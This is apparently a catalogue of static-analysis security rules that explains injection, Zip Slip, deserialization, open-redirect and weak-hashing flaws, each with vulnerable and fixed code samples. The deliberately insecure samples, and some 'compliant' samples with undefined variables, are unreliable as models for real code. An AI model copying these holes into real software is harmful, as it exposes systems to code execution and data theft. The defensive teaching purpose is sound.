Reflection injections occur in a web application when it retrieves data from a user or a third-party service and fully or partially uses it to inspect, load or invoke a component by name.

If an application uses a reflection method in a way that is vulnerable to injections, it is exposed to attacks that aim to achieve remote code execution on the server’s website.

A user with malicious intent exploits this by carefully crafting a string involving symbols such as class methods, that will help them change the initial reflection logic to an impactful malicious one.

After creating the malicious request and triggering it, the attacker can attack the servers affected by this vulnerability without relying on any pre-requisites.

What is the potential impact?

If user-supplied values are used to choose which code is executed, an attacker may be able to supply carefully-chosen values that cause unexpected code to run. The attacker can use this ability to run arbitrary code on the server.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Application-specific attacks

In this scenario, the attackers succeed in injecting a seemingly-legitimate object, but whose properties might be used maliciously.

Depending on the application, attackers might be able to modify important data structures or content to escalate privileges or perform unwanted actions. For example, with an e-commerce application, this could be changing the number of products or prices.

Full application compromise

In the worst-case scenario, the attackers succeed in injecting an object triggering code execution.

Depending on the attacker, code execution can be used with different intentions:

  • Download the internal server’s data, most likely to sell it.
  • Modify data, install malware, for instance, malware that mines cryptocurrencies.
  • Stop services or exhaust resources, for instance, with fork bombs.

This threat is particularly insidious if the attacked organization does not maintain a Disaster Recovery Plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker additionally manages to elevate their privileges as an administrator and attack other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised through a combination of unsafe deserialization and misconfiguration:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Java SE

Code examples

In the following example, the code simulates a feature in an image editing application that allows users to install plugins to add new filters or effects. It assumes the user will give a known name, such as "SepiaEffect".

Noncompliant code example

import java.lang.Class;
import java.lang.reflect.Constructor;
import java.lang.reflect.Method;

@RestController
public class EffectController
{
    @GetMapping(value = "/filter/apply")
    @ResponseBody
    public ResponseEntity<String> apply(@RequestParam("effect") String effectName)
    {
        try
        {
            Class effectClass                = Class.forName(effectName);  // Noncompliant
            Constructor<?> effectConstructor = effectClass.getConstructor();
            Object EffectObject              = effectConstructor.newInstance();
            Method applyMethod               = effectClass.getMethod("applyFilter");

            boolean result = (boolean) applyMethod.invoke(EffectObject);

        } catch (Exception e) {}

        if (result)
        {
            return new ResponseEntity<>("Filter Applied", HttpStatus.OK);
        }
        else
        {
            return new ResponseEntity<>("Filter Failure", HttpStatus.FORBIDDEN);
        }
    }
}

Compliant solution

import java.lang.Class;
import java.lang.reflect.Constructor;
import java.lang.reflect.Method;

@RestController
public class EffectController
{
    private static Set<String> EFFECT_ALLOW_LIST = new HashSet<>();

    static
    {
        allowList.add("SepiaEffect");
        allowList.add("BlackAndWhiteEffect");
        allowList.add("WaterColorEffect");
        allowList.add("OilPaintingEffect");
    }

    @GetMapping(value = "/filter/apply")
    @ResponseBody
    public ResponseEntity<String> apply(@RequestParam("effect") String effectName)
    {
        if (!EFFECT_ALLOW_LIST.contains(effectName)) {
            return new ResponseEntity<>("Filter Failure", HttpStatus.FORBIDDEN);
        }

        try
        {
            Class effectClass                = Class.forName(effectName);
            Constructor<?> effectConstructor = effectClass.getConstructor();
            Object EffectObject              = effectConstructor.newInstance();
            Method applyMethod               = effectClass.getMethod("applyFilter");

            boolean result = (boolean) applyMethod.invoke(EffectObject);

        } catch (Exception e) {}

        if (result) {
            return new ResponseEntity<>("Filter Applied", HttpStatus.OK);
        }
        else {
            return new ResponseEntity<>("Filter Failure", HttpStatus.FORBIDDEN);
        }
    }
}

How does this work?

Pre-Approved commands

The cleanest way to avoid this defect is to validate the input before using it in a reflection method.

Create a list of authorized and secure classes that you want the application to be able to execute.
If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

Important note: The application must do validation on the server side. Not on client-side front-ends.

Resources

Articles & blog posts

Standards

javasecurity:S6096

Why is this an issue?

Zip slip is a special case of path injection. It occurs when an application uses the name of an archive entry to construct a file path and access this file without validating its path first.

This rule will consider all archives untrusted, assuming they have been created outside the application file system.

A user with malicious intent would inject specially crafted values, such as ../, in the archive entry name to change the initial intended path. The resulting path would resolve somewhere in the filesystem where the user should not normally have access.

What is the potential impact?

A web application is vulnerable to Zip Slip and an attacker is able to exploit it by submitting an archive he controls.

The files that can be affected are limited by the permission of the process that runs the application. Worst case scenario: the process runs with root privileges on Linux, and therefore any file can be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Override arbitrary files

The application opens the archive to copy its entries to the file system. The entries' names contain path traversal payloads for existing files in the system, which are overwritten once the entries are copied. The vulnerability is exploited to corrupt files critical for the application or operating system to work properly.

It could result in data being lost or the application being unavailable.

How to fix it in Java SE

Code examples

The following code is vulnerable to Zip Slip as it is constructing a path using an archive entry name. This path is then used to copy a file without being validated first. Therefore, it can be leveraged by an attacker to overwrite arbitrary files.

Noncompliant code example

public class Example {

    static private String targetDirectory = "/example/directory/";

    public void ExtractEntry(ZipFile zipFile) throws IOException {

        Enumeration<? extends ZipEntry> entries = zipFile.entries();
        ZipEntry entry = entries.nextElement();
        InputStream inputStream = zipFile.getInputStream(entry);

        File file = new File(targetDirectory + entry.getName());

        Files.copy(inputStream, file.toPath(), StandardCopyOption.REPLACE_EXISTING);
    }
}

Compliant solution

public class Example {

    static private String targetDirectory = "/example/directory/";

    public void ExtractEntry(ZipFile zipFile) throws IOException {

        Enumeration<? extends ZipEntry> entries = zipFile.entries();
        ZipEntry entry = entries.nextElement();
        InputStream inputStream = zipFile.getInputStream(entry);

        File file = new File(targetDirectory + entry.getName());

        String canonicalDestinationPath = file.getCanonicalPath();

        if (canonicalDestinationPath.startsWith(targetDirectory)) {
            Files.copy(inputStream, file.toPath(), StandardCopyOption.REPLACE_EXISTING, LinkOption.NOFOLLOW_LINKS);
        }
    }
}

How does this work?

The universal way to prevent Zip Slip is to validate the paths constructed from untrusted archive entry names.

The validation should be done as follow:

  1. Resolve the canonical path of the file by using methods like java.io.File.getCanonicalFile or java.io.File.getCanonicalPath. This will resolve relative path or path components like ../ and removes any ambiguity regarding the file’s location.
  2. Check that the canonical path is within the directory where the file should be located.
  3. Ensure the target directory path ends with a forward slash to prevent partial path traversal, for example, /base/dirmalicious starts with /base/dir but does not start with /base/dir/.

Pitfalls

Partial Path Traversal

When validating untrusted paths by checking if they start with a trusted folder name, ensure the validation strings all contain a path separator as the last character.
A partial path traversal vulnerability can be unintentionally introduced into the application without a path separator as the last character of the validation strings.

For example, the following code is vulnerable to partial path injection. Note that the string targetDirectory does not end with a path separator:

static private String targetDirectory = "/Users/John";

public void ExtractEntry(ZipFile zipFile) throws IOException {

    Enumeration<? extends ZipEntry> entries = zipFile.entries();
    ZipEntry entry = entries.nextElement();
    InputStream inputStream = zipFile.getInputStream(entry);

    File file = new File(entry.getName());

    String canonicalDestinationPath = file.getCanonicalPath();

    if (canonicalDestinationPath.startsWith(targetDirectory)) {
        Files.copy(inputStream, file.toPath(), StandardCopyOption.REPLACE_EXISTING, LinkOption.NOFOLLOW_LINKS);
    }
}

This check can be bypassed because "/Users/Johnny".startsWith("/Users/John") returns true. Thus, for validation, "/Users/John" should actually be "/Users/John/".

Warning: Some functions, such as .getCanonicalPath, remove the terminating path separator in their return value.
The validation code should be tested to ensure that it cannot be impacted by this issue.

Here is a real-life example of this vulnerability.

Resources

Documentation

  • snyk - Zip Slip Vulnerability

Standards

javasecurity:S2091

Why is this an issue?

XPath injections occur in an application when the application retrieves untrusted data and inserts it into an XML Path (XPath) query without sanitizing it first.

What is the potential impact?

In the context of a web application vulnerable to XPath injection:
After discovering the injection point, attackers insert data into the vulnerable field to execute malicious commands in the affected XML documents.

The impact of this vulnerability depends on the importance of XML structures in the enterprise.
In cases where organizations rely on XML structures for business-critical operations or where XML is used only for innocuous data transport, the severity of an attack ranges from critical to harmless.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Data Leaks

A malicious XPath query allows direct data leakage from one or more databases. Although XML is not as widely used as it once was, this possibility still exists with configuration files, for example.

Data deletion and denial of service

The malicious query allows the attacker to delete data in the affected XML documents.
This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP) and if XML structures are considered important, as missing critical data can disrupt the regular operations of an organization.

How to fix it in Java SE

Code examples

The following noncompliant code is vulnerable to XPath injections because untrusted data is concatenated to an XPath query without prior validation.

Noncompliant code example

public boolean authenticate(HttpServletRequest req, XPath xpath, Document doc) throws XPathExpressionException {
  String user = request.getParameter("user");
  String pass = request.getParameter("pass");

  String expression = "/users/user[@name='" + user + "' and @pass='" + pass + "']";

  return (boolean)xpath.evaluate(expression, doc, XPathConstants.BOOLEAN);
}

Compliant solution

public boolean authenticate(HttpServletRequest req, XPath xpath, Document doc) throws XPathExpressionException {
  String user = request.getParameter("user");
  String pass = request.getParameter("pass");

  String expression = "/users/user[@name=$user and @pass=$pass]";

  xpath.setXPathVariableResolver(v -> {
    switch (v.getLocalPart()) {
      case "user":
        return user;
      case "pass":
        return pass;
      default:
        throw new IllegalArgumentException();
    }
  });

  return (boolean)xpath.evaluate(expression, doc, XPathConstants.BOOLEAN);
}

How does this work?

As a rule of thumb, the best approach to protect against injections is to systematically ensure that untrusted data cannot break out of the initially intended logic.

Parameterized Queries

For XPath injections, the cleanest way to do so is to use parameterized queries.

XPath allows for the usage of variables inside expressions in the form of $variable. XPath variables can be used to construct an XPath query without needing to concatenate user arguments to the query at runtime. Here is an example of an XPath query with variables:

/users/user[@user=$user and @pass=$pass]

When the XPath query is executed, the user input is passed alongside it. During execution, when the values of the variables need to be known, a resolver will return the correct user input for each variable. The contents of the variables are not considered application logic by the XPath executor, and thus injection is not possible.

In the example, a parameterized XPath query is created, and an XPathVariableResolver is used to securely insert untrusted data into the query, similar to parameterized SQL queries.

Validation

In case XPath parameterized queries are not available, the most secure way to protect against injections is to validate the input before using it in an XPath query.

Important: The application must do this validation server-side. Validating this client-side is insecure.

Input can be validated in multiple ways:

  • By checking against a list of authorized and secure strings that the application is allowed to use in a query.
  • By ensuring user input is restricted to a specific range of characters (e.g., the regex /^[a-zA-Z0-9]*$/ only allows alphanumeric characters.)
  • By ensuring user input does not include any XPath metacharacters, such as ", ', /, @, =, *, [, ], ( and ).

If user input is not considered valid, it should be rejected as it is unsafe.

For Java, OWASP’s Enterprise Security API offers encodeForXPath which sanitizes metacharacters automatically.

Resources

Articles & blog posts

Standards

ruby:S1313

Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
  • It misleads to use the same address in every environment (dev, sys, qa, prod).

Last but not least it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks can always be possible, but in the case of a hardcoded IP address solving the issue will take more time, which will increase an attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code, instead make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentially is not required a domain name can be used since it allows to change the destination quickly without having to rebuild the software.

Sensitive Code Example

ip = "192.168.12.42"; // Sensitive

Compliant Solution

ip = IP_ADDRESS; // Compliant

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849

See

ruby:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", …​

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

See

tsql:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", …​

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

See

tsql:S2070

This rule is deprecated; use S4790 instead.

Why is this an issue?

The MD5 algorithm and its successor, SHA-1, are no longer considered secure, because it is too easy to create hash collisions with them. That is, it takes too little computational effort to come up with a different input that produces the same MD5 or SHA-1 hash, and using the new, same-hash value gives an attacker the same access as if he had the originally-hashed value. This applies as well to the other Message-Digest algorithms: MD2, MD4, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160.

Consider using safer alternatives, such as SHA-256, SHA-512 or SHA-3.

Noncompliant code example

SELECT HASHBYTES('SHA1', MyColumn) FROM dbo.MyTable;

Compliant solution

SELECT HASHBYTES('SHA2_256', MyColumn) FROM dbo.MyTable;

Resources

tsql:S1313

Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
  • It misleads to use the same address in every environment (dev, sys, qa, prod).

Last but not least it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks can always be possible, but in the case of a hardcoded IP address solving the issue will take more time, which will increase an attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code, instead make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentially is not required a domain name can be used since it allows to change the destination quickly without having to rebuild the software.

Sensitive Code Example

SET @IP = '192.168.12.42'; -- Sensitive

Compliant Solution

SET @IP  = (SELECT ip_address FROM configuration);  -- Compliant

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737

See

tsql:S1523

Executing code dynamically is security sensitive. It has led in the past to the following vulnerabilities:

Some APIs enable the execution of dynamic code by providing it as strings at runtime. These APIs might be useful in some very specific meta-programming use-cases. However most of the time their use is frowned upon as they also increase the risk of Injected Code. Such attacks can either run on the server or in the client (exemple: XSS attack) and have a huge impact on an application’s security.

Both EXECUTE( ... ) and EXEC( ... ) execute as a command the string passed as an argument. They are safe only if the argument is composed of constant character string expressions. But if the command string is dynamically built using external parameters, then it is considered very dangerous because executing a random string allows the execution of arbitrary code.

This rule marks for review each occurrence of EXEC and EXECUTE. This rule does not detect code injections. It only highlights the use of APIs which should be used sparingly and very carefully. The goal is to guide security code reviews.

Ask Yourself Whether

  • the executed code may come from an untrusted source and hasn’t been sanitized.
  • you really need to run code dynamically.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

The best solution is to not run code provided by an untrusted source. If you really need to build a command string using external parameters, you should use EXEC sp_executesql instead.

Do not try to create a blacklist of dangerous code. It is impossible to cover all attacks that way.

Sensitive Code Example

CREATE PROCEDURE USER_BY_EMAIL(@email VARCHAR(255)) AS
BEGIN
  EXEC('USE AuthDB; SELECT id FROM user WHERE email = ''' + @email + ''' ;'); -- Sensitive: could inject code using @email
END

Compliant Solution

CREATE PROCEDURE USER_BY_EMAIL(@email VARCHAR(255)) AS
BEGIN
  EXEC sp_executesql 'USE AuthDB; SELECT id FROM user WHERE email = @user_email;',
                     '@user_email VARCHAR(255)',
                      @user_email = @email;
END

See

tsql:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset password, etc …​).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512, SHA-3 are recommended, and for password hashing, it’s even better to use algorithms that do not compute too "quickly", like bcrypt, scrypt, argon2 or pbkdf2 because it slows down brute force attacks.

Sensitive Code Example

SELECT HASHBYTES('SHA1', MyColumn) FROM dbo.MyTable;

Compliant Solution

SELECT HASHBYTES('SHA2_512', MyColumn) FROM dbo.MyTable;

See

roslyn.sonaranalyzer.security.cs:S2631

Why is this an issue?

Regular expression injections occur when the application retrieves untrusted data and uses it as a regex to pattern match a string with it.

Most regular expression search engines use backtracking to try all possible regex execution paths when evaluating an input. Sometimes this can lead to performance problems also referred to as catastrophic backtracking situations.

What is the potential impact?

In the context of a web application vulnerable to regex injection:
After discovering the injection point, attackers insert data into the vulnerable field to make the affected component inaccessible.

Depending on the application’s software architecture and the injection point’s location, the impact may or may not be visible.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Self Denial of Service

In cases where the complexity of the regular expression is exponential to the input size, a small, carefully-crafted input (for example, 20 chars) can trigger catastrophic backtracking and cause a denial of service of the application.

Super-linear regex complexity can produce the same effects for a large, carefully crafted input (thousands of chars).

If the component jeopardized by this vulnerability is not a bottleneck that acts as a single point of failure (SPOF) within the application, the denial of service might only affect the attacker who initiated it.

Such benign denial of service can also occur in architectures that rely heavily on containers and container orchestrators. Replication systems would detect the failure of a container and automatically replace it.

Infrastructure SPOFs

However, a denial of service attack can be critical to the enterprise if it targets a SPOF component. Sometimes the SPOF is a software architecture vulnerability (such as a single component on which multiple critical components depend) or an operational vulnerability (for example, insufficient container creation capabilities or failures from containers to terminate).

In either case, attackers aim to exploit the infrastructure weakness by sending as many malicious payloads as possible, using potentially huge offensive infrastructures.

These threats are particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

How to fix it in .NET

Code examples

The following noncompliant code is vulnerable to Regex Denial of Service because untrusted data is used as a regex to scan a string without prior sanitization or validation.

Noncompliant code example

public class ExampleController : Controller
{
    public IActionResult Validate(string regex, string input)
    {
        bool match = Regex.IsMatch(input, regex);

        return Json(match);
    }
}

Compliant solution

public class ExampleController : Controller
{
    public IActionResult Validate(string regex, string input)
    {
        bool match = Regex.IsMatch(input, Regex.Escape(regex));

        return Json(match);
    }
}

How does this work?

Sanitization and Validation

Metacharacters escape using native functions is a solution against regex injection.
The escape function sanitizes the input so that the regular expression engine interprets these characters literally.

An allowlist approach can also be used by creating a list containing authorized and secure strings you want the application to use in a query.
If a user input does not match an entry in this list, it should be considered unsafe and rejected.

Important Note: The application must sanitize and validate on the server side. Not on client-side front end.

Where possible, use non-backtracking regex engines, for example, Google’s re2.

In the compliant solution example, Regex.Escape escapes metacharacters and escape sequences that could have broken the initially intended logic.

Resources

Articles & blog posts

Standards

roslyn.sonaranalyzer.security.cs:S5135

Why is this an issue?

Deserialization injections occur when applications deserialize wholly or partially untrusted data without verification.

What is the potential impact?

In the context of a web application performing unsafe deserialization:
After detecting the injection vector, attackers inject a carefully-crafted payload into the application.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Application-specific attacks

In this scenario, the attackers succeed in injecting an object of the expected class, but with malicious properties that affect the object’s behavior.

If the application relies on the properties of the deserialized object, attackers can modify the data structure or content to escalate privileges or perform unwanted actions.
In the context of an e-commerce application, this could be changing the number of products or prices.

Full application compromise

In the worst-case scenario, the attackers succeed in injecting an object of a completely different class than expected, triggering code execution.

Depending on the attacker, code execution can be used with different intentions:

  • Download the internal server’s data, most likely to sell it.
  • Modify data, install malware, for instance, malware that mines cryptocurrencies.
  • Stop services or exhaust resources, for instance, with fork bombs.

This threat is particularly insidious if the attacked organization does not maintain a Disaster Recovery Plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker additionally manages to elevate his privileges as an administrator and attack other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised through a combination of unsafe deserialization and misconfiguration:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in .NET

Code examples

The following code is vulnerable to deserialization attacks because it deserializes HTTP data without validating it first.

Noncompliant code example

public class Example : Controller
{
    [HttpPost]
    public ActionResult Deserialize(HttpPostedFileBase inputFile)
    {
        ExpectedType expectedObject = null;
        var formatter               = new BinaryFormatter();
        expectedObject              = (ExpectedType)formatter.Deserialize(inputFile.InputStream);
    }
}

Compliant solution

public class Example : Controller
{
    [HttpPost]
    public ActionResult Deserialize(HttpPostedFileBase inputFile)
    {
        ExpectedType expectedObject = null;
        JsonSerializer serializer   = new JsonSerializer(typeof(expectedObject));
        expectedObject              = (ExpectedType)serializer.Deserialize(inputFile.InputStream);
    }
}

How does this work?

Allowing users to provide data for deserialization generally creates more problems than it solves.

Anything that can be done through deserialization can generally be done with more secure data structures.
Therefore, our first suggestion is to avoid deserialization in the first place.

However, if deserialization mechanisms are valid in your context, here are some security suggestions.

More secure serialization methods

Some more secure serialization methods reduce the risk of security breaches, although not definitively.

A complete object serializer is probably unnecessary if you only need to receive primitive data (for example integers, strings, bools, etc.).
In this case, formats such as JSON and XML protect the application from deserialization attacks by default.

For more complex objects, the next step is to control which class fields are exposed by creating class-specific serialization methods.
The most common method is to use Data Transfer Objects (DTO) patterns or Google Protocol Buffers (protobufs). After creating the Protobuf data structure, the Protobuf compiler creates class files that handle operations such as serializing and deserializing data.

Integrity check

Message authentication codes (MAC) can be used to prevent tampering with serialized data that is meant to be stored outside the application server:

  • On the server-side, when serializing an object, compute a MAC of the result and append it to the serialized object string.
  • When the serialized value is submitted back, verify the serialization string MAC on the server side before deserialization.

Depending on the situation, two MAC computation modes can be used.

If the same application will be responsible for the MAC computing and validation, a symmetric signature algorithm can be used. In that case, HMAC should be preferred, with a strong underlying hash algorithm such as SHA-256.

If multiple parties have to validate the serialized data, an asymetric signature algorithm should be used. This will reduce the chances for a signing secret to be leaked. In that case, the RSASSA-PSS algorithm can be used.

Note: Be sure to store the signing secret securely.

Pre-Approved classes

As a last resort, create a list of approved and safe classes that the application should be able to deserialize.
If the untrusted class does not match an entry in this list, it should be rejected because it is considered unsafe.

Note: Untrusted classes should be filtered out during deserialization, not after.
Depending on the language or framework, this should be possible by overriding the serialization process or using native capabilities to restrict type deserialization.

In the code samples, a pre-approved class is used natively by JsonSerializer to validate the class during serialization. XmlSerializer also provides this capability.
Note: The pre-approved class should not tamper with the application’s inner workings.

The following native types are considered unsafe because they do not provide these capabilities:

  • BinaryFormatter
  • SoapFormatter
  • NetDataContractSerializer
  • LosFormatter
  • ObjectStateFormatter

Resources

Standards

roslyn.sonaranalyzer.security.cs:S5146

Why is this an issue?

Open redirection occurs when an application uses user-controllable data to redirect users to a URL.

An attacker with malicious intent could manipulate a user to browse into a specially crafted URL, such as https://trusted.example.com?url=evil.example.com, to redirect the victim to his evil domain.

Tricking users into sending the malicious HTTP request is usually the main task of exploiting an open redirection. Often, it requires an attacker to build a credible pretext to prevent suspicions from the victim.

Attackers commonly use open redirect exploits in mass phishing campaigns.

What is the potential impact?

If an attacker tricks a user into opening a link of his choice, the user is redirected to a domain controlled by the attacker.

From then on, the attacker can perform various malicious actions, some more impactful than others.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Domain Mirroring

A malicious link redirects to an attacker’s controlled website mirroring the interface of a web application trusted by the user. Due to the similarity in the application appearance and the apparently trustable clicked hyperlink, the user struggles to identify that they are browsing on a malicious domain.

Depending on the attacker’s purpose, the malicious website can leak credentials, bypass Multi-Factor Authentication (MFA), and reach any authenticated data or action.

Malware Distribution

A malicious link redirects to an attacker’s controlled website that serves malware. On the same basis as the domain mirroring exploitation, the attacker develops a spearphishing or phishing campaign with a carefully crafted pretext that would result in the download and potential execution of a hosted malicious file.
The worst-case scenario could result in complete system compromise.

How to fix it in ASP.NET

Code examples

The following noncompliant code example is vulnerable to open redirection as it constructs a URL with user-controllable data. This URL is then used to redirect the user without being first validated. An attacker can leverage this to manipulate users into performing unwanted redirects.

Noncompliant code example

using System.Web;
using System.Web.Mvc;

public class ExampleController : Controller
{
    [HttpGet]
    public void Redirect(string url)
    {
        Response.Redirect(url);
    }
}

Compliant solution

using System.Web;
using System.Web.Mvc;

public class ExampleController : Controller
{
    private readonly string[] allowedUrls = { "/", "/login", "/logout" };

    [HttpGet]
    public void Redirect(string url)
    {
        if (allowedUrls.Contains(url))
        {
            Response.Redirect(url);
        }
    }
}

How does this work?

Built-in framework methods should be preferred as, more often than not, these provide additional security mechanisms. Usually, these built-in methods are engineered for internal page redirections. Thus, they might not be the solution for the reader’s use case.

In case the application strictly requires external redirections based on user-controllable data, this could be done using the following alternatives:

  1. Validating the authority part of the URL against a statically defined value (see Pitfalls).
  2. Using an allow-list approach in case the destination URLs are multiple but limited.
  3. Adding a customized page to which users are redirected, warning about the imminent action and requiring manual authorization to proceed.

Pitfalls

The trap of 'StartsWith' and equivalents

When validating untrusted URLs by checking if they start with a trusted scheme and authority pair scheme://authority, ensure that the validation string contains a path separator / as the last character.

If the validation string does not contain a terminating path separator, the Open Redirect vulnerability remains; only the exploitation technique changes.

Thus, a validation like startsWith("https://example.com") or an equivalent with the regex ^https://example\.com.* can be exploited with the following URL https://example.com.malicious.io. The practice of taking over domains that maliciously look like existing domains is widespread and is called Cybersquatting.

Resources

Standards

roslyn.sonaranalyzer.security.cs:S2078

Why is this an issue?

LDAP injections occur in an application when the application retrieves untrusted data and inserts it into an LDAP query without sanitizing it first.

An LDAP injection can either be basic or blind, depending on whether the server’s fetched data is directly returned in the web application’s response.
The absence of the corresponding response for the malicious request on the application is not a barrier to exploitation. Thus, it must be treated the same way as basic LDAP injections.

What is the potential impact?

In the context of a web application vulnerable to LDAP injection: after discovering the injection point, attackers insert data into the vulnerable field to execute malicious LDAP commands.

The impact of this vulnerability depends on how vital LDAP servers are to the organization.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Data leakage or corruption

In typical scenarios where systems perform innocuous LDAP operations to find users or create inventories, an LDAP injection could result in data leakage or corruption.

Privilege escalation

A malicious LDAP query could allow an attacker to impersonate a low-privileged user or an administrator in scenarios where systems perform authorization checks or authentication.

Attackers use this vulnerability to find multiple footholds on target organizations by gathering authentication bypasses.

How to fix it in .NET

Code examples

The following noncompliant code is vulnerable to LDAP injections because untrusted data is concatenated in an LDAP query without prior validation.

Noncompliant code example

public class ExampleController : Controller
{
    public IActionResult Authenticate(string user, string pass)
    {
        DirectoryEntry directory  = new DirectoryEntry("LDAP://ou=system");
        DirectorySearcher search  = new DirectorySearcher(directory);

        search.Filter = "(&(uid=" + user + ")(userPassword=" + pass + "))";

        return Json(search.FindOne() != null);
    }
}

Compliant solution

public class ExampleController : Controller
{
    public IActionResult Authenticate(string user, string pass)
    {
        // restrict the username and password to letters only
        if (!Regex.IsMatch(user, "^[a-zA-Z]+$") || !Regex.IsMatch(pass, "^[a-zA-Z]+$"))
        {
            return BadRequest();
        }

        DirectoryEntry directory  = new DirectoryEntry("LDAP://ou=system");
        DirectorySearcher search  = new DirectorySearcher(directory);

        search.Filter = "(&(uid=" + user + ")(userPassword=" + pass + "))";

        return Json(search.FindOne() != null);
    }
}

How does this work?

As a rule of thumb, the best approach to protect against injections is to systematically ensure that untrusted data cannot break out of the initially intended logic.

For LDAP injection, the cleanest way to do so is to use parameterized queries if it is available for your use case.

Another approach is to sanitize the input before using it in an LDAP query. Input sanitization should be primarily done using native libraries.

Alternatively, validation can be implemented using an allowlist approach by creating a list of authorized and secure strings you want the application to use in a query. If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

Important note: The application must sanitize and validate on the server-side. Not on client-side front-ends.

